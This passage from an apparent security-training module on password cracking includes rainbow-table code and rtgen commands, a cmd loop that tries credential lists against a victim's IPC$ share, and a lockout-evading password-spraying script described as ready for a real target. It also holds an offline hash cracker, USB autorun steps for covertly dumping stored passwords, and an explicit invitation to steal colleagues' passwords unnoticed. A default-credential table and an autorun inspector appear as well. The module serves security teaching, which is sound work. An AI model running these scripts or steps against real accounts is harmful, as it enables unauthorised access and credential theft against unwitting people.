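        if start is None:
            continue
        # candidate chain found: walk it from the start and confirm (false alarms happen)
        cand = start
        for step in range(chain_len):
            if h(cand) == target_hex:
                return cand
            cand = reduce_fn(h(cand), step)
    return None


def demo(chain_len=20, num_chains=2000):
    """Return (entries stored, keyspace size, unsalted hash cracked?, salted lookup result)."""
    table = build_table(chain_len, num_chains)
    # pick a password that is known to lie inside a stored chain
    endpoint, start = next(iter(table.items()))
    target = start
    for step in range(3):
        target = reduce_fn(h(target), step)
    cracked = lookup(table, h(target), chain_len)
    # the same password, hashed with a salt the table never saw
    salted_miss = lookup(table, h_salted(target, "7f3a"), chain_len)
    return len(table), KEYSPACE, cracked == target, salted_miss


if __name__ == "__main__":
    print(demo())
```

The table stores at most one entry per chain against a keyspace of 17,576 hashes; the lookup pays for that saving with extra hash computations, which is the trade-off the text describes.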

Tools to Create Rainbow Tables: Winrtgen and rtgen

- Winrtgen is a graphical Rainbow Tables Generator that supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes
- The rtgen program needs several parameters to generate a rainbow table; the syntax of the command line is:

Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

[Screenshots: Winrtgen "Rainbow Table properties" dialog; Command Prompt running rtgen ntlm loweralpha 1 7 0 1000 4000000 0]

http://www.oxid.it
http://project-rainbowcrack.com

Tools to Create Rainbow Tables: Winrtgen and rtgen

Attackers can create rainbow tables by using the following tools.

Winrtgen

Source: http://www.oxid.it

Winrtgen is a graphical Rainbow Tables Generator that helps attackers to create rainbow tables from which they can crack the hashed password. It supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes.

[Screenshot: Winrtgen "Rainbow Table properties" dialog with fields Min Len, Max Len, Index, Chain Len, Chain Count, N° of tables and Charset; Table properties shown: Key space: 8353082582 keys, Disk space: 810.35 MB, Success probability: 0.978038 (97.80%); Optional parameter: Hash speed, Step speed, Table precomputation time, Total precomputation time, Max cryptanalysis time; Benchmark / Cancel buttons]

FIGURE 5.7: Winrtgen Generate Rainbow Table in Window

Source: http://project-rainbowcrack.com

RainbowCrack is a general purpose implementation that takes advantage of the time-memory trade-off technique to crack hashes. This project allows you to crack a hashed password. The rtgen tool of this project is used to generate the rainbow tables. The rtgen program needs several parameters to generate a rainbow table; you can use the following syntax of the command line to generate rainbow tables:

Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index
[Screenshot: Command Prompt running rtgen ntlm loweralpha 1 7 0 1000 4000000 0; the printed table parameters show hash algorithm ntlm, hash length 16, charset abcdefghijklmnopqrstuvwxyz (charset length 26), plaintext length range 1 - 7, key space 8353082582, and batches of rainbow chains generated in about 7.6 s each]

FIGURE 5.8: rtgen Generate Rainbow Table in Window

Distributed Network Attack

- A Distributed Network Attack (DNA) technique is used for recovering password-protected files using the unused processing power of machines across the network to decrypt passwords
- In this attack, a DNA manager is installed in a central location where machines running DNA clients can access it over the network
- The DNA Manager is installed in a central location where machines running DNA Client can access it over the network
- DNA Manager coordinates the attack and allocates small portions of the key search to machines that are distributed over the network
- DNA Client runs in the background, consuming only unused processor time
- The program combines the processing capabilities of all the clients connected to the network and uses it to perform the key search to decrypt them

Distributed Network Attacks

A Distributed Network Attack (DNA) is the technique used for recovering password-protected files. It utilizes the unused processing power of machines across the network to decrypt passwords. In this attack, a DNA manager is installed in a central location where machines running DNA clients can access it over the network. The DNA manager coordinates the attack, assigning small portions of the key search to machines distributed throughout the network. The DNA client runs in the background, only taking unused processor time. The program combines the processing capabilities of all the clients connected to the network and uses them to perform a key search on Office 97 and 2000 to decrypt them.

Features of the DNA:
- Reads statistics and graphs easily
- Adds user dictionaries to crack the password
- Optimizes password attacks for specific languages
- Modifies the user dictionaries
- Comprises stealth client installation functionality
- Automatically updates the client while updating the DNA server
- Controls the clients and identifies work done by clients

DNA is divided into two modules:

DNA Server Interface

The DNA server interface allows users to manage DNA from a server. The DNA server module provides the user with the status of all jobs that the DNA server is executing. This interface is divided into:
- Current jobs: The current job queue has all the jobs that have been added to the list by the controller. The current job list has many columns, such as the identification number that has been assigned by the DNA to the job, the name of the encrypted file, the password that has been used by the user, the password that matches a key which can unlock data, the status of the job, and various other columns.
- Finished jobs: The finished job list provides information about the jobs that can be decrypted by including the password. The finished jobs list also has many columns that are similar to the current job list. These columns include the identification number assigned by DNA to the job, the name of the encrypted file, the decrypted path of the file, the key used to encrypt and decrypt the file, the date and time that the DNA server started working on the job, the date and time the DNA server finished working on the job, the elapsed time, etc.

DNA Client Interface

The DNA client interface can be used from many workstations. The client statistics can be easily coordinated by using the DNA client interface. This interface is available on machines where the DNA client application has been installed. There are many components such as the name of the DNA client, the name of the group to which the DNA client belongs, the statistics about the current job, and many other components.

Network Management

The Network Traffic application in Windows is used for the purpose of network management. The Network Traffic dialog box is used to find out the network speed that DNA uses and each work unit length of the DNA client. Using the work unit length, a DNA client can work without contacting the DNA server. The DNA client application has the ability to contact the DNA server at the beginning and ending of the work unit length.

The user can monitor the job status queue and the DNA. When the data is collected from the Network Traffic dialog box, modification to the client work unit can be made. When the size of the work unit length increases, the speed of the network traffic decreases. If the traffic has been decreased, the client work on the jobs would require a longer amount of time. Therefore, fewer requests to the server can be made due to the reduction in the bandwidth of network traffic.


Elcomsoft Distributed Password Recovery

Features:
- Distributed password recovery over LAN, Internet, or both
- Plug-in architecture allows for additional file formats
- Schedule support for flexible load balancing
- Install and remove password recovery clients remotely
- Encrypted network communications

Elcomsoft Distributed Password Recovery breaks complex passwords, recovers strong encryption keys, and unlocks documents in a production environment

http://www.elcomsoft.com

Elcomsoft Distributed Password Recovery

Source: http://www.elcomsoft.com

Elcomsoft Distributed Password Recovery allows you to break complex passwords, recover strong encryption keys, and unlock documents in a production environment. It allows the execution of mathematically intensive password recovery code on the enormously parallel computational elements found in modern graphic accelerators. This employs an innovative technology to accelerate password recovery when a compatible ATI or NVIDIA graphics card is present, in addition to the CPU-only mode. When compared with the password recovery methods that only use the computer's main CPU, the GPU acceleration used by this technology makes password recovery faster. This supports password recovery of a variety of applications and file formats.

Features & Benefits
- Reduces password recovery time
- Distributed password recovery over LAN, Internet, or both
- Console management for flexible control from any networked PC
- Plug-in architecture allows for additional file formats
- Flexible queue control allows easy job management
- Install and remove password recovery clients remotely


[Figure 5.9: two screenshots of the Elcomsoft Distributed Password Recovery console. The job queue lists Test1.xlsx to Test5.xlsx, Reva.xlsx and CSoft.xlsx with progress, remaining and elapsed time, current and average speed, and status (recovered, paused, not encrypted); the status bar reads "total: 7, not started: 1, paused: 1, waiting: 0, recovered: 5, not recovered: 0, not encrypted: 1". The attack panel shows a dictionary (English) attack with mutation, prefix/suffix and character-group options (lowercase, uppercase, digits, symbols), the Agents view and the local agent online.]

FIGURE 5.9: Elcomsoft Distributed Password Recovery Screenshot

Non-Electronic Attacks

- Shoulder surfing: looking at either the user's keyboard or screen while he/she is logging in
- Dumpster diving: searching for sensitive information in the user's trash bins, printer trash bins, and on the user's desk for sticky notes
- Social engineering: convincing people to reveal confidential information
Non-Electronic Attacks

Non-electronic attacks are also termed non-technical attacks. This kind of attack doesn't require any technical knowledge about the methods of intruding into another's system, which is why it is named a non-electronic attack. There are four types of non-electronic attacks: social engineering, shoulder surfing, keyboard sniffing, and dumpster diving.
Dumpster Diving

Dumpster diving is a key attack method that targets a substantial failure in computer security: the very information that people crave, protect, and devotedly secure can be obtained by almost anyone willing to scrutinize garbage. It allows you to gather information about the target's passwords by looking through the trash. This low-tech attack type has many implications.

Because security was weaker than it is today, dumpster diving was actually quite popular in the 1980s. The term "dumpster diving" refers to any useful, general information that is found and taken from areas where it has been discarded. These areas include trash cans, curbside containers, dumpsters, and the like, from which the information can be obtained for free. Curious and/or malicious attackers may find password files, manuals, sensitive documents, reports, receipts, credit card numbers, or diskettes that have been thrown away.


Simply put, the examination of waste products that have been dumped into dumpster areas may be helpful to attackers, and there is ample information to support this concept. Such useful information was dumped with no thought to whose hands it might end up in. This data can be utilized by attackers to gain unauthorized access to others' computer systems, or the objects found can prompt other types of attacks such as those based on social engineering.

Shoulder Surfing

Shoulder surfing is when an intruder stands inconspicuously, but near, a legitimate user, watching as the password is entered. The attacker simply looks at either the user's keyboard or screen while he or she is logging in, and watches to see if the user is staring at the desk for a password reminder or the actual password. This is possible only when the attacker is physically close to the target.

This type of attack can also occur in a grocery store checkout line when a potential victim is swiping a debit card and entering the required PIN. Many of these Personal Identification Numbers are only four digits long.

Eavesdropping refers to the act of secretly listening to someone's conversation. Passwords can be determined by secretly listening to password exchanges. If the attacker fails to get your password by guessing, there are other ways he or she can try to get it. "Password sniffing" is an alternative used by attackers to get their targets' passwords.

Many networks use broadcast technology, which means that every message a computer on the network transmits can be read by every computer connected to that network. In practice, all computers other than the recipient notice that the message is not intended for them and ignore it. However, a computer can be programmed to look at every message transmitted by a specific computer on the network, and in this way read messages that are not intended for it. Attackers have programs to do this, and then scan all the messages traversing the network looking for the password. Two caveats apply: this holds for hubs and shared wireless media, whereas on a switched network the attacker must first redirect traffic to the sniffing host (for example by ARP spoofing or through a mirror port); and only protocols that carry the password in the clear, such as Telnet, FTP, or HTTP without TLS, expose it this way.

You may end up giving your password to the attacker if you are logging in to a computer across a network and some computers on the network have been compromised this way. Using this password sniffing technique, attackers have collected thousands of passwords by breaking into computers connected to a heavily used network.

Social Engineering

In computer security, social engineering is the term for a non-technical kind of intrusion. Typically, it relies heavily on human interaction and often involves tricking other people into breaking normal security procedures. A social engineer runs a "con game" to break the security procedures. For example, an attacker using social engineering to break into a computer network would try to gain the trust of someone who is authorized to access the network, and then try to extract the information that compromises the network security.


Social engineering is the practice of procuring confidential information by deceiving or swaying people. An attacker can misrepresent himself as a user or system administrator in order to obtain a password from a user. It is natural for people to be helpful and trusting. Any person generally makes an effort to build amicable relationships with his or her friends and colleagues. Social engineers take advantage of this tendency.

Another trait of social engineering relies on the inability of people to keep up with a culture that relies heavily on information technology. Most people are not aware of the value of the information they possess and are careless about protecting it. Attackers take advantage of this fact for the intrusion. Habitually, social engineers search dumpsters for valuable information. A social engineer would have a tougher time getting the combination to a safe, or even the combination to a health club locker, than a password. The best defense is to educate, train, and create awareness.

Keyboard Sniffing

Keyboard sniffing allows you to capture the password as the target types it, by recording the keystrokes with a keylogger.


Default Passwords

A default password is a password supplied by the manufacturer with new equipment that is password protected.

Online tools to search default passwords:

- http://cirt.net
- http://default-password.info
- http://www.defaultpassword.us
- http://www.passwordsdatabase.com
- https://w3dt.net
- http://www.virus.org
- http://open-sez.me
- http://securityoverride.org
- http://www.routerpasswords.com
- http://www.fortypoundhead.com
Default Passwords

Source: http://securityoverride.org

Default passwords are passwords supplied by manufacturers with new equipment. Usually the default password provided by the manufacturer for a password-protected device allows the device to be accessed during its initial setup. Because the same default ships with every unit of a model, anyone who can look it up can log in to a device whose administrator never changed it. Online tools that can be used to search for default passwords include:

- http://cirt.net
- http://default-password.info
- http://www.defaultpassword.us
- http://www.passwordsdatabase.com
- https://w3dt.net
- http://www.virus.org
- http://open-sez.me
- http://securityoverride.org
- http://www.routerpasswords.com
- http://www.fortypoundhead.com
FIGURE 5.10: Default Password Screenshot

Entries shown in the screenshot (blank cells were not listed):

Vendor   Model                        Version              Access Type   Username   Password
3COM     CoreBuilder                  7000/6000/3500/2500  Telnet        Debug      Synnet
3COM     CoreBuilder                  7000/6000/3500/2500  Telnet        Tech       Tech
3COM     HiPerARC                     v4.1.x               Telnet        Adm        (none)
3COM     LANplex                      2500                 Telnet        Debug      Synnet
3COM     LANplex                      2500                 Telnet        Tech       Tech
3COM     LinkSwitch                   2000/2700            Telnet        Tech       Tech
Huawei   E960                                                            Admin      Admin
3COM     NetBuilder                                        SNMP                     ILMI
3COM     Netbuilder                                        Multi         Admin      (none)
3COM     Office Connect ISDN Routers  5x0                  Telnet        n/a        PASSWORD
3COM     SuperStack II Switch         2200                 Telnet        debug      Synnet
3COM     SuperStack II Switch         2700                 Telnet        tech       Tech
3COM     OfficeConnect 812 ADSL                            Multi         adminttd   adminttd

Default-password lists are crowd-sourced and vary in accuracy, so each entry is a candidate to verify against the device, not a fact; the same list is what a defender should check an equipment inventory against.

TABLE 5.1: Online Tools To Search Default Password

Manual Password Cracking (Guessing)

- Frequency of attacks is low
- The failure rate is high
- Create a list of possible passwords
- Rank passwords from high probability to low
- Key in each password, until the correct password is discovered
Manual Password Cracking (Guessing)

Manual password cracking encompasses attempting to log on with different passwords. Guessing is the key element of manual password cracking. The password is the key value of data that is needed to access the system. Once a password is cracked, the attacker moves on to the remaining phases of system hacking: escalating privileges, executing applications, hiding files, and covering tracks.

Attackers make many attempts to crack passwords in order to intrude into a target's system. Passwords can be cracked manually or using automated tools, methods, and algorithms. Password cracking can also be automated using a simple FOR loop. Manual password cracking involves the following steps:

- Find a valid user
- Create a list of possible passwords
- Rank passwords from high probability to low
- Key in each password, until the correct password is discovered

An attacker can also create a script file that tries each password in a list; this is still considered manual cracking. The failure rate of this type of attack is high, and every failed attempt is visible to the target: most systems log failed logins and lock the account after a handful of them, so the list has to be short and well ranked.

Manual Password Cracking Algorithm

In its simplest form, password guessing can be automated using a simple FOR loop. In the example that follows, an attacker creates a simple text file with user names and passwords that are iterated using the FOR loop.

The main FOR loop can extract the user names and passwords from the text file that serves as a dictionary as it iterates through every line:

    [file: credentials.txt]
    administrator ""
    administrator password
    administrator administrator
    [Etc.]

From a directory that can access the text file, the command is typed as follows (the caret at the end of each line continues the command, and "More?" is the cmd.exe continuation prompt):

    c:\>FOR /F "tokens=1,2*" %i in (credentials.txt) ^
    More? do net use \\victim.com\IPC$ %j /u:victim.com\%i ^
    More? 2>>nul ^
    More? && echo %time% %date% >> outfile.txt ^
    More? && echo \\victim.com acct: %i pass: %j >> outfile.txt

    c:\>type outfile.txt

Each line of credentials.txt yields %i (the user name, first token) and %j (the password, second token); net use tries that pair against the IPC$ share, and the two echo commands run only when it succeeds. outfile.txt therefore contains the correct user name and password if a pair in credentials.txt is correct, and at that point an open session to the victim server has been established from the attacker's system.
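The same procedure in Python, as an added example that is not part of the original module. It runs offline against a constructed mock login target that, like any real server, answers only success, failure or locked, and locks an account after an assumed five failures. It adds the two things the FOR loop above lacks: candidates are ranked (empty password, the user name, then the list in frequency order, then simple mutations) and they are sprayed across all accounts one guess at a time, with a per-account budget one below the lockout threshold, so no account is locked and no single account shows a burst of failures. The account names, passwords and word list are constructed; MockLoginTarget, rank_candidates and spray are the example's own names.

```python
"""Ranked, lockout-aware online password guessing (added example).

MockLoginTarget stands in for a real server: from the network an attacker
only ever sees "success", "failure" or "locked", which is what this class
returns. Its lockout threshold of 5 failed attempts is an assumption.
"""
import hashlib
import hmac
from collections import defaultdict


class MockLoginTarget:
    """Checks a password against a stored hash and enforces account lockout."""

    def __init__(self, users, lockout_threshold=5):
        # Store only one-way hashes, as a real system would.
        self._hashes = {u: hashlib.sha256(p.encode()).digest() for u, p in users.items()}
        self.threshold = lockout_threshold
        self.failures = defaultdict(int)
        self.locked = set()
        self.attempts = 0  # every attempt would appear in the target's logs

    def login(self, user, password):
        self.attempts += 1
        if user not in self._hashes:
            return "failure"  # same answer as a wrong password: no user enumeration
        if user in self.locked:
            return "locked"
        candidate = hashlib.sha256(password.encode()).digest()
        if hmac.compare_digest(candidate, self._hashes[user]):
            self.failures[user] = 0
            return "success"
        self.failures[user] += 1
        if self.failures[user] >= self.threshold:
            self.locked.add(user)
        return "failure"


def rank_candidates(user, wordlist):
    """Step 3 of the procedure: order the guesses from most to least likely.

    Empty password and the user name itself come first, then the word list
    in its given (assumed frequency) order, then each word with a trailing
    "1" or "!". Duplicates are dropped while preserving order.
    """
    ordered = ["", user, user.capitalize()] + list(wordlist)
    ordered += [w + "1" for w in wordlist] + [w + "!" for w in wordlist]
    seen, result = set(), []
    for guess in ordered:
        if guess not in seen:
            seen.add(guess)
            result.append(guess)
    return result


def spray(target, users, wordlist, lockout_threshold):
    """Step 4: key in each password, but spread the attempts across accounts.

    The FOR loop in the text hammers one account with the whole list, which
    locks it out after a few lines. Trying candidate i against every account
    before moving on to candidate i+1 (password spraying) keeps each
    account's failure count low, and the per-account budget stays one below
    the lockout threshold so no account is ever locked.
    """
    budget = lockout_threshold - 1
    tried = defaultdict(int)
    recovered = {}
    queues = {u: rank_candidates(u, wordlist) for u in users}
    depth = max((len(q) for q in queues.values()), default=0)
    for i in range(depth):
        for user in users:
            if user in recovered or tried[user] >= budget or i >= len(queues[user]):
                continue
            tried[user] += 1
            if target.login(user, queues[user][i]) == "success":
                recovered[user] = queues[user][i]
    exhausted = [u for u in users if u not in recovered]
    return recovered, exhausted


def demo():
    """Run the guesser against constructed accounts; returns what it found."""
    users = {  # constructed sample accounts, not real credentials
        "administrator": "password",
        "jsmith": "jsmith",
        "svc_backup": "x7!kQ9#zLm",
    }
    wordlist = ["password", "welcome", "letmein", "123456"]  # assumed frequency order
    target = MockLoginTarget(users, lockout_threshold=5)
    recovered, exhausted = spray(target, list(users), wordlist, target.threshold)
    return recovered, exhausted, sorted(target.locked), target.attempts


if __name__ == "__main__":
    print(demo())
```

Running the module prints the recovered pairs, the account on which the budget ran out, the accounts that got locked (none) and the total number of attempts the target logged; against a real target the only change is replacing MockLoginTarget.login with the actual authentication call.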

Automatic Password Cracking Algorithm

- Find the algorithm used for encryption
- Create a list of the possible passwords
- Verify whether there is a match for each user ID
- Repeat the cycle until the correct password is discovered
Automatic Password Cracking Algorithm

As security awareness increased, most systems began running passwords through some type of algorithm to generate a hash. This hash is usually more than just a rearrangement of the original password. It is usually a one-way hash: a string of characters that cannot be reversed into its original text.

However, the vulnerability does not arise from the hashing process, but from password storage. The password that is stored at the time of authentication is not decrypted by most systems; such systems store only one-way hashes. During the local login process, the password entered is run through the algorithm, generating a one-way hash that is compared to the hash stored on the system. If the two are identical, it is assumed that the proper password was used.

Therefore, all an attacker has to do in order to crack a password is to get a copy of the one-way hash stored on the server, and then use the same algorithm to generate his or her own hashes until one matches. Most systems (Microsoft, UNIX, and NetWare) have publicly documented their hashing algorithms. What makes the comparison cheap for the attacker is a fast, unsalted hash: a per-user salt forces the work to be redone for every account, and a deliberately slow hash such as bcrypt, scrypt, or PBKDF2 multiplies the cost of each guess.

Attackers can use a combination of attack methods to reduce the time involved in cracking a password. The Internet provides freeware password crackers for NT, NetWare, and UNIX.

There are password lists that can be fed to these crackers to carry out a dictionary attack. In its simplest form, automation involves finding a valid user and the particular hash (or encryption) algorithm being used, obtaining the stored hashes, creating a list of all possible passwords, hashing each word, and checking for a match for each user ID known. This process is repeated until the desired results are obtained or all options are exhausted.

Automatic password cracking algorithms should include the following steps:

- Find a valid user
- Find the hash (or encryption) algorithm used
- Obtain the stored password hashes
- Create a list of possible passwords
- Hash each word
- See if there is a match for each user ID

Performing Automated Password Guessing

If the attacker fails in a manual attack, he or she can choose to automate the process. There are several free programs that can assist in this effort, such as Legion, John the Ripper, and NetBIOS Auditing Tool (NAT). The simplest of these automation methods takes advantage of the net command. This involves a simple loop using the NT/2000 shell FOR command. All the attacker has to do is create a simple user name and password file and reference it within a FOR command (each line holds a user name followed by its password, so %i is the user and %j the password):

    C:\> FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %j /u:%i

Automated password attacks can be categorized as follows:

- A simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against the user accounts that the application locates. A dictionary attack succeeds only if the password is actually in the list; length alone does not protect a password that is a dictionary word.

- The brute force method is the most inclusive, although slow. Usually it tries every possible letter and number combination in its automated exploration.

- A hybrid approach combines features of both methods. It usually starts with a dictionary, and then tries combinations such as two words together or a word and numbers.

Users tend to have weak passwords because they do not know what constitutes a strong password and, therefore, do not know how to create strong passwords for their accounts. As shown, this leaves passwords open to attack.
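An added example, not the module's own code and not any of the named crackers, that carries the six steps of the automatic cracking algorithm through in Python against unsalted hashes and also implements the three attack categories just listed (dictionary, brute force, hybrid) as candidate generators. The user accounts, their passwords and the word list are constructed; SHA-256 is the assumed algorithm identified in step 2, and digest, crack and run_attack are the example's own names.

```python
"""Offline cracking of unsalted one-way hashes (added example).

Given the hash algorithm and a copy of the stored hashes, generate candidate
passwords, hash each one and compare it with every user's hash. Candidates
come from three generators tried in order of cost: dictionary, hybrid (word
mutations), then exhaustive brute force. Sample hashes and word list are
constructed; SHA-256 is the assumed algorithm identified in step 2.
"""
import hashlib
import itertools
import string


def digest(algorithm, text):
    """Hex digest of text under the named hashlib algorithm."""
    return hashlib.new(algorithm, text.encode()).hexdigest()


def dictionary(words):
    """Plain dictionary attack: each word exactly as listed."""
    yield from words


def hybrid(words, suffixes=("", "1", "12", "123", "!", "2012")):
    """Hybrid attack: case variants of each word joined with short suffixes
    (the "word and numbers" combinations the text mentions)."""
    for word in words:
        for variant in (word.lower(), word.capitalize(), word.upper()):
            for suffix in suffixes:
                yield variant + suffix


def brute_force(charset, max_len):
    """Exhaustive search over every string of length 1..max_len from charset."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def crack(hashes, algorithm, candidates):
    """Hash each candidate once and look it up against every user's hash.

    hashes: {user: hex digest}. Because the hashes are unsalted, one hash
    computation tests a candidate against all users at once; a per-user
    salt would force the work to be repeated for every account.
    """
    by_hash = {}
    for user, h in hashes.items():
        by_hash.setdefault(h, []).append(user)
    found = {}
    for candidate in candidates:
        for user in by_hash.get(digest(algorithm, candidate), ()):
            found.setdefault(user, candidate)
        if len(found) == len(hashes):
            break  # every account recovered, stop early
    return found


def run_attack(hashes, algorithm, words,
               charset=string.ascii_lowercase + string.digits, max_len=3):
    """Dictionary, then hybrid, then brute force, each stage run only against
    the accounts the previous stages did not recover."""
    found = {}
    for candidates in (dictionary(words), hybrid(words), brute_force(charset, max_len)):
        remaining = {u: h for u, h in hashes.items() if u not in found}
        if not remaining:
            break
        found.update(crack(remaining, algorithm, candidates))
    return found


def demo():
    """Constructed sample: four users with unsalted SHA-256 hashes."""
    passwords = {"alice": "letmein", "bob": "Welcome1",
                 "carol": "ab1", "dave": "Tr0ub4dor&3-long"}
    hashes = {u: digest("sha256", p) for u, p in passwords.items()}
    words = ["password", "letmein", "welcome", "qwerty"]
    return run_attack(hashes, "sha256", words)


if __name__ == "__main__":
    print(demo())
```

The stages run in order of cost, and each stage is fed only the hashes the previous ones did not recover. The brute-force stage is bounded to three characters of lowercase letters and digits so the example finishes in well under a second; the same loop over a realistic character set and length is what makes brute force "inclusive but slow", and dave's password, which none of the three stages reaches, shows why a long non-dictionary password survives.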

Stealing Passwords Using USB Drives

- Download PassView, a password hacking tool
- Copy the downloaded files to the USB drive
- Create autorun.inf in the USB drive:

    [autorun]
    open=launch.bat

- Contents of launch.bat:

    start pspv.exe /stext pspv.txt

- Insert the USB drive and the autorun window will pop up (if enabled)
- PassView is executed in the background and the passwords will be stored in .TXT files on the USB drive
Stealing passwords using a USB drive is a physical approach to hacking passwords stored on a computer. Attackers can steal passwords using a USB drive and different applications. People who have multiple online accounts usually store their user names and passwords as a backup to use if they forget them. You can recover or steal such credentials using a USB drive.

The physical approach matters a lot for hacking passwords. This method is applicable to hacking stored passwords on any computer. Most people signing up for a large number of websites store their passwords on the computer in order to remember them. One can try recovering them automatically using a USB drive. This requires plugging the USB drive into any port of the computer in which the passwords have been stored. This trick applies to Windows XP, Windows 7, Windows Vista, and Windows 2000 with AutoRun enabled. Note that Windows 7 and later do not run autorun.inf from USB mass-storage devices, and Microsoft back-ported that change to XP and Vista in 2011, so on a patched system the user has to start launch.bat by hand (or AutoRun has to have been re-enabled by policy).

All the applications included are portable and light enough that they can be copied to the USB disk in a few seconds. You can also hack stored Messenger passwords. Using these tools and a USB pen drive you can create a toolkit to hack passwords from the target computer.

Stealing passwords using a USB device is carried out with the help of the following steps:

1. You need a password hacking tool.
2. Copy the downloaded .exe files of the password hacking tools to the USB drive.

3. Create a Notepad document and put the following content in it:

    [autorun]
    open=launch.bat

   After writing this content into Notepad, save the document as autorun.inf and copy this file to the USB drive.

4. Open Notepad and write the following content into it:

    start pspv.exe /stext pspv.txt

   After that, save the file as launch.bat and copy this file to the USB drive. (/stext is the NirSoft command-line switch that writes the recovered entries to a plain text file.)

5. Insert the USB drive; the autorun window pops up (if enabled).

6. The password hacking tool is executed in the background and the passwords are stored in .TXT files on the USB drive.

In this way, you can create your own USB password recovery toolkit and use it to steal the stored passwords of your friends or colleagues without the knowledge of the person. This process takes only a few seconds to retrieve passwords.

FIGURE 5.11: Stealing Passwords Using USB Drives
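An added example that is not part of the module: the defensive counterpart to the steps above, a Python inspector that parses an autorun.inf the way the steps describe it and reports what the file would launch, whether the target is actually on the drive, and any "action" text that would disguise the launch as a harmless AutoPlay choice. The sample autorun.inf (the one from step 3 plus an action line) and the drive listing are constructed; parse_autorun, launch_target and inspect_autorun are the example's own names.

```python
"""Inspect an autorun.inf for what it would launch (added example).

Parses the INI-style file described in the steps above and reports the
program or script an "open" or "shellexecute" entry points at, whether that
target is actually present on the drive, and any "action" text that would
disguise the launch as a harmless AutoPlay choice. The sample autorun.inf
and drive listing are constructed for the example.
"""
import configparser

LAUNCH_KEYS = ("open", "shellexecute")
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".exe", ".com", ".scr", ".pif", ".vbs", ".js")


def parse_autorun(text):
    """Return the [autorun] section as a lower-cased {key: value} dict.

    Handles a UTF-8 BOM, a section header in any letter case, duplicate
    keys (the last one wins) and '%' characters in values. A file with no
    [autorun] section, or one that is not INI at all, yields {}.
    """
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    try:
        cp.read_string(text.lstrip("\ufeff"))
    except configparser.Error:
        return {}
    for name in cp.sections():
        if name.lower() == "autorun":
            return {k: v.strip() for k, v in cp.items(name)}
    return {}


def launch_target(value):
    """First token of an open=/shellexecute= value, quotes removed."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:].split('"', 1)[0]
    return value.split()[0] if value else ""


def inspect_autorun(text, drive_files):
    """Summarise what the file would do on a system that still honours it.

    drive_files: names in the drive's root directory (constructed here; on
    a real drive pass os.listdir(drive)). Matching is case-insensitive, as
    file names are on FAT and NTFS.
    """
    entries = parse_autorun(text)
    present = {name.lower() for name in drive_files}
    launches = []
    for key in LAUNCH_KEYS:
        if key in entries:
            target = launch_target(entries[key])
            launches.append({
                "key": key,
                "target": target,
                "present": target.lower() in present,
                "is_script": target.lower().endswith(SCRIPT_EXTENSIONS),
            })
    return {
        "launches": launches,
        "disguised_action": entries.get("action", ""),
        "label": entries.get("label", ""),
        "suspicious": any(l["present"] and l["is_script"] for l in launches),
    }


# Constructed sample: the autorun.inf from step 3, plus the "action" line
# attackers add so AutoPlay lists the launch as "Open folder to view files".
SAMPLE_AUTORUN = (
    "\ufeff[AutoRun]\n"
    "open=launch.bat\n"
    "icon=setup.ico\n"
    "action=Open folder to view files\n"
    "label=USB DISK\n"
)
SAMPLE_DRIVE = {"autorun.inf", "LAUNCH.BAT", "pspv.exe", "setup.ico"}


def demo():
    """Inspect the constructed sample; returns the findings dict."""
    return inspect_autorun(SAMPLE_AUTORUN, SAMPLE_DRIVE)


if __name__ == "__main__":
    print(demo())
```

The check flags the drive as suspicious only when the launch target is both a script or executable and actually present, so a stale autorun.inf pointing at a deleted file is reported but not flagged; the disguised "action" text is returned separately because it is the detail that turns a visible "Run launch.bat" into a click the user makes without thinking.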

Stealing Passwords Using Keyloggers

- Keyloggers provide one of the easiest and most effective means of stealing all of a victim's user names and passwords
- If an attacker succeeds in infecting a victim's machine with a Trojan that has keylogging features, he can instruct the Trojan server to log and send back all user credentials to his machine

1. Attacker infects the victim's local PC with a software keylogger
2. Victim logs on to the domain server with his credentials
3. Keylogger sends the login credentials to the attacker
4. Attacker gains access to the domain server
Stealing Passwords Using Keyloggers

Whenever an attacker needs to crack something, he or she usually thinks about the possible loopholes in the whole process. Passwords are the piece of data used to access an account or a system. Choosing complex passwords makes your accounts more secure and the attacker's job harder, but not impossible. Passwords are the piece of data submitted to a system or application to gain access to it, and they are usually entered through the keyboard. Hence, if an attacker has software or a mechanism that can log the keystrokes and send the report to him or her, the attacker can determine the passwords easily, however complex they are. The programs that allow this are keyloggers, a kind of malware. Keyloggers can expose all the keystrokes entered by the target, including user names and passwords for any websites. A remote keylogger can give an attacker access not only to your email and online accounts, but can compromise your financial details as well. Keyloggers are used by people to find a certain piece of information such as a user name or password. The pictorial representation clearly explains the way attackers steal passwords using keyloggers.


FIGURE 5.12: Stealing Passwords Using Keyloggers

When stealing passwords, the attacker first infects the victim's local PC with a software keylogger. When the victim logs on to the domain server with his or her credentials, the keylogger automatically sends the login credentials (user name, password) to the attacker without the victim's knowledge. Once the attacker has the victim's login credentials, he or she logs on to the domain server and may perform any action.
